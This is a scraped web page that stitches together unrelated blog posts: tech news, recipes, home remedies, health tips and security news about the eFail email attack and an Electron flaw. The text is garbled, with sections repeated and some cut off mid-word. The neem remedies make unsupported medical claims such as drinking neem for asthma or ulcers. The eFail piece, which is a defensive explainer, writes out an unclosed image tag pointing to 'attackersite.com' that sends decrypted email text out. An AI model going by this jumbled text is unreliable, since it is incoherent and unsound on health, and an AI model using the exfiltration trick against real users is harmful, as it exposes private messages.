Loading...

May 20, 2018

This Wi-Fi Router Can Read Your Emotion

Are you good at hiding your feelings?
No issues, your Wi-Fi router may soon be able to tell how you feel, even if you have a good poker face.
A team of researchers at MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) have developed a device that can measure human inner emotional states using wireless signals.
Dubbed EQ-Radio, the new device measures heartbeat, and breath to determine whether a person is happy, excited, sad, or angry.



Using EQ-Radio, which emits and captures reflected radio frequency (RF) waves, the team bounced waves off a person’s body to measure subtle changes in breathing patterns and heart rates.
This data was then run through a bunch of algorithms and a machine-learning process programmed to match a person's behavior to how they acted previously, categorizing the person's emotion as one of the four emotional states: Pleasure, Joy, Anger and Sadness.
The impressive part about the technique:
EQ-Radio doesn't require you to wear any sort of monitoring device or on-body sensor.
"The whole thing started by trying to understand how we can extract information about people’s emotions and health in general using something that’s completely passive—does not require people to wear anything on their body or have to express things themselves actively," says Prof. Dina Katabi, who conducted the research along with graduate students Mingmin Zhao and Fadel Adib.
In its test, the team says if their device is trained on each subject separately, it measures emotions with 87 percent accuracy and 72.3 percent accuracy when using a single classifier for all subjects.
EQ Radio uses the same carrier frequency as Wi-Fi, but with about 1,000 times less power, which means the system could be integrated into an existing Wi-Fi router or other devices that transmit and receives wireless signals.
According to the researchers, EQ-Radio, and similar systems may help in some practical situations, like:
movie makers and advertisers could use it to better evaluate people's reactions to their work in real time;
doctors could use it to diagnose mental health conditions like depression or bipolar disorder; and
it could also integrate into smart homes, adjust temperature, lighting, and music automatically to match the user's mood...
...all without the target's knowledge or consent. All it takes is some RF signals mixed with a set of algorithms and a dash of machine learning process.
For more technical details and working of the EQ-Radio device, you can head on to the research paper [ PDF] titled, " Emotion Recognition using Wireless Signals.

Andromeda OS' — An Android-Chrome OS Hybrid

Google's long-rumored Android-Chrome hybrid operating system is expected to debut at the company's upcoming hardware event on October 4.
The company has been working to merge the two OSes for roughly 3 years with a release planned for 2017, but an "early version" to show things off to the world in 2016.



Android + Chrome = Andromeda
The hybrid OS, currently nicknamed 'Andromeda,' could be come on a new Pixel laptop as well as Huawei Nexus tablet from Google by Q3 2017, if not sooner, according to new leaks from 9to5Google and
Android Police .
Android + Chrome = Andromeda
The laptop, officially codenamed "Bison" and nicknamed "Pixel 3," is a reference to the "Chromebook Pixel," but since this edition is not running Chrome operating system, one can not call it a "Chromebook" anymore.
Andromeda is separate from the company's Fuchsia OS, which is focused on Internet-of-Thing (IoT) devices. Moreover, the report also makes it clear that Andromeda "is [an entirely] distinct effort from Google's current campaign to bring Android apps to Chromebooks." So, don't get confused.
Rumored specs suggest Bison is expected to pack a 12.3-inch display with a 'tablet' mode and stylus and reportedly powered by an Intel M3 processor like Apple's 12-inch MacBook, or an Intel Core i5.
Bison is expected to have two models with 32GB or 128GB of internal storage, and 8GB or 16GB of RAM.
Other features could include two USB-C ports, a 3.5mm headphone jack, a fingerprint scanner, stereo speakers, a backlit keyboard, quad microphones, a glass trackpad, and a battery that lasts around 10 hours.
For more details about the new hybrid operating system, you need to wait for two more weeks for Google's October 4 event that is set to launch a Google's new hardware product line, including " Google Wi-Fi " router, Google Home, the refreshed 4K-capable Chromecast rumored to be called Chromecast Ultra, and a "Daydream" VR headset.

Sprouted mung bean pancake

Mung bean is known for its high protein content and is easy to sprout.
Sprouted mung beans have additional source of energy and gives cooling effect to body.
It is easily digestible and one can add sprouted mung bean to salads, make sambar or cool drinks.
Sometimes eating mung bean can cause bit of gas problem .
To get benefit of mung bean one can sprout mung beans and prepare mung bean pancakes (also known as dosa) by adding light spices such as cumin, coriander, turmeric and fennel.
Adding these ingredients makes it more digestible and easy on stomach.


1. Sprouted mung beans – 2 cups
2. Carrot -1/4 cup
3. Zucchini chopped -1/4 cup
4. Baking soda -1/2 tsp
5. Cumin powder– 1 tsp
6. Fennel powder – 1 tsp
7. Coriander powder – ½ tsp
8. Cilantro chopped – ¼ cup
9. Turmeric powder – 1 tsp
10. Corn flour – 1 cup (to get dosa batter consistency)
11. Salt – as per taste
1. Sprout 1 cup of green mung beans
2. In a grinder add all the ingredients with
sprouted mung beans . Add water and grind.
3. To grinded mix add corn flour and chopped cilantro. Add water and mix to get dosa batter consistency
4. Place a tava (pan) on medium heat and apply oil
5. Pour a ladle of batter on the tava and spread it thin (or thick the way you want it)
6. Cook both the sides to golden brown
7. Serve the hot pancake with green chutney

reasons making you less attractive

Even though you are gorgeous and beautiful, have you wondered why sometimes people does not find you attractive or don’t show interest to keep up friendship or relationship with you?
It can happen with anyone.
Most times we don’t realize what could be the reason.
Sometimes friends or family members might say what could be the reason, sometimes we need to look into ourselves to understand what needs to be changed or need to be done.
“It is beauty that captures the attention; it is personality which captures your heart” Anonymous
Here are common factors that makes us less attractive or unattractive..

1. Having no hobby: One of the most attractive personality is having a hobby. People are attracted to those who are passionate about something and some good hobby. It can be any hobby that is attractive and exciting. When you share your hobby, naturally people will get to know you and your hobby.
2. Being mean : When you are surrounded by people and if you express only negativity and mean to other people move away. You look unattractive when you are mean to anybody.
3. Body smell : This one is obvious. Washing body and keeping yourself body odor free is important. If not, no one wants to be close to you. If you are healthy and not suffering from any medical condition, then seriously consider what is the reason for your body odor. Oral hygiene , cleaning arm pits, private parts, ears, wearing washed cloths – all these are critical if you want to be amid people.
4. Dishonesty : Dishonesty is a major turn off for both genders. Whether you are intelligent or less intelligent, beautiful or handsome, rich or poor – if you are not honest in your action and words then you are not attractive. Being honest is a character that attracts people.
5. Bing drinking and smoking : Drinking and smoking are highly unattractive personalities and women generally does not like to have a relationship with such men. Occasional drinking is fine with women but not smoking.
Smoking frequently is unattractive as the negative impact of smoking (on health) is understood by most people.
6. Too much stress : Whether it is small or big matter, if a person is constantly expressing and blaming system for their stress then such personalities are unattractive. No one wants to listen to constant complaints 24X7 days. Stress is part of life, managing stress is one skill that if someone has, then it makes that person attractive.
7. Bad table manners : Sharing is caring. If you don’t share food or offer food to guests or share with friends in a restaurant or with family, it is not going to give good reputation. If you cross contaminate food with your spoon or hands or making sound while eating, texting while eating and more importantly if you don’t treat waiter/waitress properly then consider yourself unattractive.
8. Pessimism: Being pessimistic often linked to unsuccessful and unattractive personality because it is a quality no one wants to have as it hinders personal growth. People who are pessimistic o also express cynical views and it can be depressing to others. LISTEN TO GRANDMA
Even though you are gorgeous and beautiful, have you wondered why sometimes people does not find you attractive or don’t show interest to keep up friendship or relationship with you?
It can happen with anyone.
Most times we don’t realize what could be the reason.
Sometimes friends or family members might say what could be the reason, sometimes we need to look into ourselves to understand what needs to be changed or need to be done.
“It is beauty that captures the attention; it is personality which captures your heart” Anonymous
Here are common factors that makes us less attractive or unattractive..
If you want to be with friends and have
healthy relationship then adopt a healthy life and healthy habit. It helps you to be amid people and keeps you happy!

How to prevent and take care of cooking fire?

1. Stay in the kitchen: Keep an eye on cooking. Do not leave cooking area unattended because the number one cause of cooking fire is not paying attention and unattending.
2. Check food regularly. If you are roasting, simmering, seasoning, baking, frying it is important to keep an eye on food. You can also use a timer to remind you to check on dish.
3. Oil: If oil is too hot or seasoning is not done properly, oil will attract fire. Do not overheat oil. Overheated oil will spill out and can cause ignition.
4. Keep stove top clear: Do not place dishtowel, paper towel, oven mitts on stove top. These materials can catch fire.
5. Clothing: Do not wear lose clothing while cooking. Wear short or close-fitting sleeves.
6. Clean cooking surfaces: Use a proper liquid and remove food and grease build up.
7. No gasoline: Do not store gasoline inside the kitchen and house. Likewise, do not keep store solvents, flammable materials, cleaners close to stove surface.
8. Vessels: Pan and pots that have handles should have proper handle covered with fire resistant material.
9. Gas cylinder: Learn how to open and lock gas cylinder. Learn safety measurements while handling gas cylinder. If gas is leaking, open all the windows. Let the gas empty kitchen and house. Do not light the gas.
10. Watch children: Do not leave children unattended in kitchen while cooking. When old enough, teach children fire safety .
11. Grill: If you are using grill, be sure to keep it clean and away from materials that could catch on fire. If you are using starter fluid be careful. Propane gas tanks should be checked for leaks on regular basis
1. Slide a pan lid over flames to smother grease or oil fire and turnoff the heat. Leave the lid in place until the pan cools.
2. Use baking soda to extinguish food fires. Do not use water or flour on cooking fires.
3. Keep the oven door shut and turn off the heat to smother an oven or broiler fire
4. Keep a fire extinguisher in the kitchen and learn how to use it.
5. Smoke detector: Have a working smoke detector at home. Change the batteries twice a year.
Cooking fire are the lead cause of burnt wounds and injuries.
To protect yourself and family, learn how to prevent a cooking fire in your kitchen.
Here are important safe cooking tips .

Inflammatory bowel disease

Inflammatory bowel disease (IBD) is a term for two conditions – Crohn’s disease and ulcerative colitis both are chronic inflammation of the gastrointestinal (GI) tract. IBD often mistaken as IBS – Irritable bowel syndrome .


To diagnose IBD endoscopy is used for Crohn’s disease and colonoscopy for ulcerative colitis. With these imaging studies, MRI, computed tomography or CT are used. Doctors will check stool samples to check
any possible infection or run blood test to confirm their diagnosis.
Crohn’s Disease : Can affect any part of the GI tract from mouth to anus). Most often it affects the portion of the small intestine before the large intestine/colon

1. Stop smoking. Smoking worsens treatment outcomes and increases flares-up among patients with Crohn’s disease.
2. Get recommended vaccinations. IBD patients treated with certain medications have a higher risk for infection.
3. Ask your doctor if you should be screened for colorectal cancer. Patients with IBD may need to start screening for colorectal cancer before age 50.
4. If you are a woman with IBD, talk to your doctor about how to prevent cervical cancer. Patients with IBD are at higher risk of cervical cancer.
5. Ask your doctor if you need a bone density test. Certain medications used to treat IBD may increase your risk for osteoporosis.
6. Eat smaller meals at more frequent intervals. Eat five small meals a day, every three or four hours, rather than the traditional three large meals a day.
7. Reduce the amount of greasy or fried foods. High-fat foods may cause diarrhea and gas if fat absorption is incomplete.
8. Watch dairy intake. Persons who are lactose intolerant or who are experiencing IBD or IBS may need to limit the amount of milk or milk products they consume.
9. Restrict the intake of certain high-fiber foods. If there is narrowing of the bowel, these foods may cause cramping. High-fiber foods also cause contractions once they enter the large intestine. Because they are not completely digested by the small intestine, these foods may also cause diarrhea.
10. Avoid problem (trigger) foods. Eliminate any foods that make symptoms worse. These may include “gassy” food (such as beans, cabbage and broccoli), spicy food, popcorn and alcohol, as well as foods and drinks that contain caffeine, such as chocolate and soda.
11. Foods to try: Bananas, applesauce, canned varieties of fruit, White bread, crackers made with white flour, plain cereals, White rice, refined pastas, Potatoes without the skin, Cheese (if you’re not lactose intolerant). Smooth peanut butter, Bland soft foods, Cooked vegetables, Canola and olive oils, Low-sugar sports drinks and Crystal Light diluted with water
12. Foods to avoid: Fresh fruit (unless blended or juiced), Prunes, raisins or dried fruit, Uncooked vegetables and raw foods, High-fiber foods (such as fiber-rich breads, cereals, nuts and leafy greens), High-sugar foods, Skins, seeds, popcorn, High-fat foods, Spicy foods, Beans, Some dairy products, Large food portions, Caffeine in coffee, tea and other beverages, Ice-cold liquids (even water)
www.cdc.gov
http://www.crohnscolitisfoundation.org HEALTH TIPS
Inflammatory bowel disease (IBD) is a term for two conditions – Crohn’s disease and ulcerative colitis both are chronic inflammation of the gastrointestinal (GI) tract. IBD often mistaken as IBS – Irritable bowel syndrome .
Symptoms of Inflammatory bowel disease are:
To diagnose IBD endoscopy is used for Crohn’s disease and colonoscopy for ulcerative colitis. With these imaging studies, MRI, computed tomography or CT are used. Doctors will check stool samples to check
any possible infection or run blood test to confirm their diagnosis.
Crohn’s Disease : Can affect any part of the GI tract from mouth to anus). Most often it affects the portion of the small intestine before the large intestine/colon.
Ulcerative Colitis : Occurs in the large intestine (colon) and the rectum
How is IBD treated? Different types of medications including immunomodulators, corticosteroids, aminosalicylates are used. To prevent infections vaccinations are recommended. Severe IBD required to remove damaged portion of GI. Now a days surgery is uncommon due to advances in treatments. Both Crohn’s disease and ulcerative colitis require different types of surgeries.
How to manage IBD?


Ways to use Neem for better health

Neem can be used for external application as well as for internal conditions.
If you are consider taking neem for internal conditions, be cautious and start with small dosage.
Neem is very bitter and at the same time it is a powerful medi


1. For crack: Wash and grind 2 cups of neem leaves with ½ tsp turmeric powder by adding little water and prepare paste. Apply this paste under and around feet before going to bed. Leave for half an hour and wash using warm water. If you prefer use twice a day and get relief from cracks.
2. For skin:
Boil few neem leaves in half liter water. Water should turn to light green. Strain, cool and store neem water in a bottle. Before washing face, dip a cotton in neem water and apply on face. Leave it for couple of minutes and wash face. This reduces skin blemishes.
Take few neem and tulsi leaves, wash and grind with sandalwood powder and few drops of rose water. Apply on face and allow it to dry before washing face using cold water. This lightens skin blemishes.
Neem also acts as a moisturizer and has coolant effect on body. Grind neem leaves with little water and prepare paste. To this add few drops grapeseed oil and mix well. Apply this paste to face a s moisturizer.
3. For hair:
Neem is known for its antibacterial and other medical properties. To reduce dandruff, boil neem leaves and use it after shampooing. Another way to use neem leaves is prepare neem leaves paste with water and apply on scalp. Leave it for an hour and wash using good shampoo.
Boil neem leaves with shikakai powder. Wash hair using this mix. Do not allow shikakai to enter eyes. Hair becomes healthy and silky.
4. For asthma: Add couple of drops of neem oil to boiling water and drink the water. One can also use fresh neem leaves, boil and drink half or one ounce. This controls phlegm, fever and cough.
5. Eye cleaning: Boil few neem leaves and use the water to wash eyes – externally. This reduces tiredness, redness and any irritation.
6. For oral health: Neem twigs are one of the best traditional medicine used to keep
good oral health. Traditionally neem twigs were chewed morning hours before breakfast and used as toothbrushes. This practice is still one can see in India.
7. To treat ulcers: Neem bark extract is good to ulcer. Wash and boil neem bark for few minutes. Strain and drink half or one ounce of this water to reduce ulcers. This is same medicine that helps to cure malaria and other skin diseases.
8. Neem tea : Dried neem powder can be stored in bottle and use to make neem tea. Add few drops of lemon in it and it helps to get rid of toxins from body. This also boosts immunity.
9. For stomach worms: Chop neem leaves and mix with jaggery. Have ¼ tsp of this mix once a day. This clears stomach and takes care of stomach worms.
10. Neem flower: Dry neem flowers well and store in bottle. You can fry these dried flowers in little oil with salt, asafetida and pepper powder. Mix with white rice and ghee (clarified butter) and have it for lunch. This increases appetite and metabolism! GRANDMA'S REMEDIES
Neem can be used for external application as well as for internal conditions.
If you are consider taking neem for internal conditions, be cautious and start with small dosage.
Neem is very bitter and at the same time it is a powerful medicinal herb.
Here are ways to use neem -
If you have neem trees around your home, spend some time near or under the tree. Wind that blows through neem tree is believed to be good for overall health of humans.
Grandma’s remedies – Online grandma- Healthylife.werindia.com
Recommended for you
WRITE A COMMENT
Leave a Reply
HEALTH ALERT
KIDS' CORNER
FOOD ACTIVISM
GUEST ARTICLES
NUTRITION NEWS
List Of Zodiac Signs That Are More Likely To Be Narcissists
10 Amazing Health Benefits Of Leeks
Banana Yogurt Face Pack For Fair Skin
DIY Homemade Mascara To Add Beauty Appeal To Your Eyes
Mango Ice Cream Recipe| How To Make Mango Ice Cream| Easy Home-made Mango Ice Cream Recipe
Zodiac Signs That Are More Likely To Get Divorced
BODY AND MIND
MEAL PLANNER
INFOGRAPHICS Shop Related Products

May 19, 2018

Mexico School district adopted Vegan meals

Mexico’s second largest state will serve 925,000 vegan meals in its schools starting this year!
This announcement came out recently after an agreement between Mexican Government and Mercy for Animals “Come consciente” Latin food policy program. Come Consciente is “Conscious Eating”.
In August 2017 Public health advocates and Animal welfare tasted a major victory in Mexico when the Permanent Commission of the congress passed a resolution urging the systems to serve meat and egg free meals one day a week.
According to WHO reports in Mexico, diabetes alone is responsible for 80,000 death every year.
To control death rate by diabetes condition, both Endocrinology physicians and American Diabetes Association recommended Vegan- plant based diet as part of effective treatment.
Vegan diet known to reduce blood sugar level, body inflammation and lowers risk of heart disease. And in order to bring down childhood obesity schools will serve vegan meals in Mexico’s largest state.

From April this plant based Vegan food program is replacing 20% of animal products served in Veracruz, Mexico’s second largest state. Vegan meals will be served every Monday. According to Food policy specialist Coral Gonzalez, ‘by replacing 20% of its meat, dairy and eggs with healthy, eco-friendly plant based foods state of Veracruz is leading the way to brighter future’.
Vegan meals program is successfully running in both Brazil and Mexico. Veracruz is the first state to sign the bill to promote
plant based education. This program introduces kids to healthier eating and develops consciousness about animals. Children will learn benefits of plant based food and develop taste for sustainable choices too.
It is a groundbreaking accomplishment for Come Cosncente, MFA Mexico and the state of Veracruz. All three organizations are in hopes to reduce the rate of childhood obesity and malnutrition as both are linked to
learning problems in young children .
MFA is looking forward to working with other state Governments in Mexico to achieve same goals and implement more such conscious eating programs in schools to reduce childhood obesity.

How to address bed wetting problem in children? Between the age 1 and 2 bladder slowly, gradually enlarges and bladder capacity is still small Between 3 & 4 children learn to void, or inhibit voiding voluntarily At age 5 majority children will have adult pattern urinary control KID'S CORNER Bed wetting can be due to me

Bed wetting can be due to medical issues or
developmental issues in children. It is not uncommon in young children. Human body produces urine all the time regardless of how much water or liquid we consume.
Bed wetting experience is common in childhood and involuntary nighttime wetting can be seen in young boys and girls both.
Reasons for bed wetting: Heredity, high urine production, small bladder capacity , sleep disorder, food sensitivities (like carbonated drinks), constipation and irregular bowel movement. During young age bladder develops gradually.


Between the age 1 and 2 bladder slowly, gradually enlarges and bladder capacity is still small
Between 3 & 4 children learn to void, or inhibit voiding voluntarily
At age 5 majority children will have adult pattern urinary control
When the problem started?
How bad it is and how frequent?
Any medical condition?
Any protective undergarments?
Does child is scared or tend to be a heavy sleeper?
Tell your child not to worry
Do not punish your child for wetting
Don’t compare your child with other kids
Don’t’ restrict childs fluid intake
Make a visit to physician
Encourage child and boost confidence
Do set goals with child about reducing bedwetting and practice alarm use
Focus on child success and downplay any bedwetting incidents
Do pay attention to child’s progress and the treatment.
1. Restricting fluids: It is not that effective because, fluid consumption is not usually the cause of bed wetting problem. This may risk child’s health and child may suffer from dehydration.
2. Punishment: Punishing child will lead to poor self esteem, increased anxiety and disturbs social skills
3. Drug therapy: Some may be temporarily effective. Most children begin wetting once they stop medication.
One recommendation is to use bed wetting or moisture alarms as these devices train child to understand and recognize full bladder. The alarms success rate is higher and relapse is lower. Parents can select different types of bed wetting alarms.
Encourage children for bathroom trip before going to bed.
Create a positive incentive that act subconsciously and helps child to end bed wetting. Give a sticker on a grid chart every time child stays dry at night.
Constipation is a common cause of bladder problem. Pressure on bladder due to hard poop can lead to instability in the bladder and results in nighttime accident. Address constipation issue in child.
Help child remove any soiled protective bedding and replace with new, clean protection after incident. Encourage child to replace new ones in future. Keep towels and underpads near the bed.
Do not complain, scold and punish child for bed wetting. This will bring their self esteem low and will hurt their creativity and social and school days.
Talk to child and understand what is bothering her/him. Encouraging and discussing about certain issues will help them to overcome bed wetting.
https://bedwettingstore.com/
https://www.parents.com/ KID'S CORNER
Bed wetting can be due to medical issues or
developmental issues in children. It is not uncommon in young children. Human body produces urine all the time regardless of how much water or liquid we consume.
Bed wetting experience is common in childhood and involuntary nighttime wetting can be seen in young boys and girls both.
Reasons for bed wetting: Heredity, high urine production, small bladder capacity , sleep disorder, food sensitivities (like carbonated drinks), constipation and irregular bowel movement. During young age bladder develops gradually.
Medical cause of bed wetting:
Bladder infection, Diabetes, Kidney infection , Bladder/urinary abnormality.
Before visiting pediatrician or physician understand child’s bed wetting problem

When the problem started?
How bad it is and how frequent?
Any medical condition?
Any protective undergarments?
Does child is scared or tend to be a heavy sleeper?
Tell your child not to worry
Do not punish your child for wetting
Don’t compare your child with other kids
Don’t’ restrict childs fluid intake
Make a visit to physician
Encourage child and boost confidence
Do set goals with child about reducing bedwetting and practice alarm use
Focus on child success and downplay any bedwetting incidents
Do pay attention to child’s progress and the treatment.
1. Restricting fluids: It is not that effective because, fluid consumption is not usually the cause of bed wetting problem. This may risk child’s health and child may suffer from dehydration.
2. Punishment: Punishing child will lead to poor self esteem, increased anxiety and disturbs social skills
3. Drug therapy: Some may be temporarily effective. Most children begin wetting once they stop medication.
One recommendation is to use bed wetting or moisture alarms as these devices train child to understand and recognize full bladder. The alarms success rate is higher and relapse is lower. Parents can select different types of bed wetting alarms.
Encourage children for bathroom trip before going to bed.
Create a positive incentive that act subconsciously and helps child to end bed wetting. Give a sticker on a grid chart every time child stays dry at night.
Constipation is a common cause of bladder problem. Pressure on bladder due to hard poop can lead to instability in the bladder and results in nighttime accident. Address constipation issue in child.
Help child remove any soiled protective bedding and replace with new, clean protection after incident. Encourage child to replace new ones in future. Keep towels and underpads near the bed.
Do not complain, scold and punish child for bed wetting. This will bring their self esteem low and will hurt their creativity and social and school days.
Talk to child and understand what is bothering her/him. Encouraging and discussing about certain issues will help them to overcome bed wetting.
https://bedwettingstore.com/
https://www.parents.com/ KID'S CORNER
Bed wetting can be due to medical issues or
developmental issues in children. It is not uncommon in young children. Human body produces urine all the time regardless of how much water or liquid we consume.
Bed wetting experience is common in childhood and involuntary nighttime wetting can be seen in young boys and girls both.
Reasons for bed wetting: Heredity, high urine production, small bladder capacity , sleep disorder, food sensitivities (like carbonated drinks), constipation and irregular bowel movement. During young age bladder develops gradually.
Medical cause of bed wetting:
Bladder infection, Diabetes, Kidney infection , Bladder/urinary abnormality.
Before visiting pediatrician or physician understand child’s bed wetting problem
Parents discussion and talking to children can overcome the problem of bed wetting. Parents should follow some do’s and don’t while approaching the situation.

Cluster headache what is it ?

One of the worst painful headaches that humans can experience is cluster headaches that consists of group of headaches on one side of the head.
It is an excruciatingly painful headache disorder one can have. It is severe than migraine.
It is very rare to have both migraine and cluster headache coexisting. 15 to 22% people who suffer from cluster headache will have suicidal thought during cluster headache attacks. For this reason, it is also called suicidal headache.
Cluster headache is a rare chronic condition. During the pain one feels pain attacks in group or clusters means headaches occurring back to back over subsequent hours and days. These attacks can occur on consecutive days for 6 to 8 weeks. Everyday on specific time it appears and generally it will be during night time.
Cluster headache affects around 0.3% of the population. It develops in the age group of 20 to 40, occurs rarely in children and extremely rare after age 70-75. Cluster headaches has been described by patients as boring, bearing, burning, like a hot poker in the eye as well as suicide headaches. From a doctor’s note – some of the ways pain clusters are described by patients are:
“Jabbing eye socket with white hot poker and holding it there for 45 minutes”


Severe headaches on unilateral side
Headache near the orbit, the bone framing the eye, supraorbital (above orbit), temporal (at temple) or in a combination of all these sites. Sometimes it appears towards back of head.
Red eye, eyelid swelling, forehead and facial sweating, tearing, abnormal small size of the pupil, nasal congestion, runny nose, drooping eyelid
Restless or agitated during headache attacks.
Attacks are one sided only and almost always the same side of the head and duration of attack is generally 15 minutes to 3hours
High flow of pure oxygen by mask
Sumatriptan nasal spray or injection
Zolmitriptan nasal spray
DHE -45 injection or nasal spray
Physical activity can relieve cluster headaches
Lithium
Topiramate, melatonin is recommended.
There is no curative treatment available for cluster headaches.
Preventive medicines like verapamil are prescribed for this pain.
1. Dodick DW, Rozen TD, Goadsby PJ, Silberstein SD. Cluster headache. Cephalalgia 2000; 20:787.
2. https://americanmigrainefoundation.org/understanding-migraine/cluster-headache/
3. https://www.theatlantic.com HEALTH ALERT
One of the worst painful headaches that humans can experience is cluster headaches that consists of group of headaches on one side of the head.
It is an excruciatingly painful headache disorder one can have. It is severe than migraine.
It is very rare to have both migraine and cluster headache coexisting. 15 to 22% people who suffer from cluster headache will have suicidal thought during cluster headache attacks. For this reason, it is also called suicidal headache.
Cluster headache is a rare chronic condition. During the pain one feels pain attacks in group or clusters means headaches occurring back to back over subsequent hours and days. These attacks can occur on consecutive days for 6 to 8 weeks. Everyday on specific time it appears and generally it will be during night time.
Cluster headache affects around 0.3% of the population. It develops in the age group of 20 to 40, occurs rarely in children and extremely rare after age 70-75. Cluster headaches has been described by patients as boring, bearing, burning, like a hot poker in the eye as well as suicide headaches. From a doctor’s note – some of the ways pain clusters are described by patients are:
“Jabbing eye socket with white hot poker and holding it there for 45 minutes”
“Just got shot in the face”
“Papercut in the eye, in the center of my head”
“Sharp and excruciating pain”
“Feels like running away from pain”
Symptoms: Cluster headache is a rare condition and misdiagnosed in many cases. It is not like migraine. Reports reveal that “most headache doctors have had patients with cluster headaches who have committed suicide from the worst pain”

PGP and S/MIME Tools Can Reveal Encrypted Emails in Plaintext

Note—the technical details of the vulnerabilities introduced in this article has now been released, so you should also read our latest article to learn how the eFail attack works and what users can do to prevent themselves.
An important warning for people using widely used email encryption tools—PGP and S/MIME—for sensitive communication.
A team of European security researchers has released a warning about a set of critical vulnerabilities discovered in PGP and S/Mime encryption tools that could reveal your encrypted emails in plaintext.
What's worse? The vulnerabilities also impact encrypted emails you sent in the past.


PGP, or Pretty Good Privacy, is an open source end-to-end encryption standard used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, computer security professor at Münster University of Applied Sciences, headed on to Twitter to warn users of the issue, and said that "there are currently no reliable fixes for the vulnerability."
Electronic Frontier Foundation (EFF) has also confirmed the existence of “undisclosed” vulnerabilities and recommended users to uninstall PGP and S/MIME applications until the flaws are patched.
"EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages," the organisation said in its
blog post.
"Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email."
So, until the vulnerabilities are patched, users are advised to stop sending and especially reading PGP-encrypted emails for now, and use alternative end-to-end secure tools, such as Signal .
EFF has warned users to immediately disable if they have installed any of the following mentioned plugins/tools for managing encrypted emails:
Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win
It should be noted that researchers have not claimed that the flaws reside in the way encryption algorithm works; instead, the issues appear in the way email decryption tools/plugins work.
The full technical details of the vulnerabilities will be released in a paper on Tuesday at 7 am UTC (3 am Eastern, midnight Pacific time).
Stay Tuned to The Hacker News for further details on the vulnerabilities

RCE flaw on apps built with Electron Framework

A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers.
Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
Besides its own modules, Electron framework also allows developers to create hybrid desktop applications by integrating Chromium and Node.js framework through APIs.


Since Node.js is a robust framework for server-side applications, having access to its APIs indirectly gives Electron-based apps more control over the operating system installed on the server.
To prevent unauthorised or unnecessary access to Node.js APIs, Electron framework by default sets the value of "webviewTag" to false in its "webPreferences" configuration file, which then sets "nodeIngration" to false.
This configuration file with the hardcoded values of some parameters was introduced in the framework to prevent real-time modifications by malicious functions, i.e., by exploiting a security vulnerability like cross-site scripting (XSS).
Moreover, if an app developer skips or forgets to declare "webviewTag: false" in the configuration file, even then the framework by default considers the value of "nodeIntegration" as false, to take a preventive measure.
However, Trustwave researcher Brendan Scarvell has
released proof-of-concept (PoC) code that attackers can inject into targeted applications running without "webviewTag" declared, by exploiting a cross-site scripting flaw, to achieve remote code execution.
The exploit re-enables "nodeIntegration" in runtime, allowing attackers to gain unauthorised control over the application server and execute arbitrary system commands.
It should be noted that the exploit would not work if the developer has also opted for one of the following options:
nativeWindowOption option enabled in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.
The vulnerability, tracked as CVE-2018-1000136, was reported to the Electron team by Scarvell earlier this year and affected all versions of Electron at the time of discovery.
Electron developers patched the vulnerability in March 2018 with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4.
So, app developers should ensure their applications are patched, or at least not vulnerable to this issue.
For more technical details on the Electron vulnerability and PoC exploit code, you can head on to the Trustwave's blog post.
It should also be noted that the Electron bug has nothing to do with the recently discovered flaw in Signal app, which has also recently patched a critical cross-site scripting vulnerability that leads to remote code execution, whose full technical details are scheduled to be published exclusively on The Hacker News this evening. Stay Tuned!

Attack Works Against PGP and S/MIME Encrypted Emails

With a heavy heart, security researchers have early released the details of a set of vulnerabilities discovered in email clients for two widely used email encryption standards—PGP and S/MIME—after someone leaked their paper on the Internet, which was actually scheduled for tomorrow.
PGP and S/MIME are popular end-to-end encryption standards used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
Before explaining how the vulnerability works, it should be noted that the flaw doesn't reside in the email encryption standards itself; instead, it affects a few email clients/plugins that incorrectly implemented the technologies.


Dubbed eFail by the researchers, the vulnerabilities, as described in our previous early-warning article , could allow potential attackers to decrypt the content of your end-to-end encrypted emails in plaintext, even for messages sent in the past.
According to the paper released by a team of European security researchers, the vulnerabilities exist in the way encrypted email clients handle HTML emails and external resources, like loading of images, styles from external URLs.
Here's How the eFail Attack Works:
Email clients are usually configured to automatically decrypt the content of encrypted emails you receive, but if your client is also configured to load external resources automatically, attackers can abuse this behavior to steal messages in plaintext just by sending you a modified version of the same encrypted email content.
The attack vector requires injected plaintext into the encrypted mail, and then using the exploit, it will exfiltrate the originally encrypted data as soon as any recipient's mail client accesses (or decrypts) the message
It should be noted that to perform an eFail attack, an attacker must have access to your encrypted emails, which is then modified in the following way and send back to you in order to trick your email client into revealing the secret message to the remote attacker without alerting you.
As described in the proof-of-concept attack released by the researchers, the attacker uses one of the encrypted messages you are supposed to receive or might have already received and then turns it into a multipart HTML email message, as well as forges the return address, so it appears to come from the original sender.
In the newly composed email, the attacker adds an unclosed image tag, like this <img src="https://attackersite.com/ just before the encrypted content and ends it by adding the end of the image tag, like this: .jpg">, as clearly shown in the screenshot.
When your vulnerable email client receives this message, it decrypts the encrypted part of the message given in the middle, and then automatically tries to render the HTML content, i.e., the image tag with all the decrypted text as the new name of the image, as shown below.
Since your email client will try to load the image from the attacker-controlled server, the attacker can capture this incoming request, where the filename contains the full content of the original encrypted email in plaintext.
Although PGP has been designed to show you a warning note if the integrity of your email is compromised, a few email clients do not display these warnings, allowing any potential attackers to perform eFail attacks successfully.
How To Prevent Against eFail Attacks
Generally, it is a very tough job for an advisory to even intercept your encrypted emails, but for people desperately using email encryption always attract well-resourced and sophisticated attackers.
Ditching the use of PGP or S/MIME to prevent eFail attacks would be stupid advice, as it is quite easy to mitigate the reported issues.
Users can switch to a good email client that always shows a warning when the integrity of the emails is compromised and doesn't render HTML emails by default to prevent loading of external resources automatically.
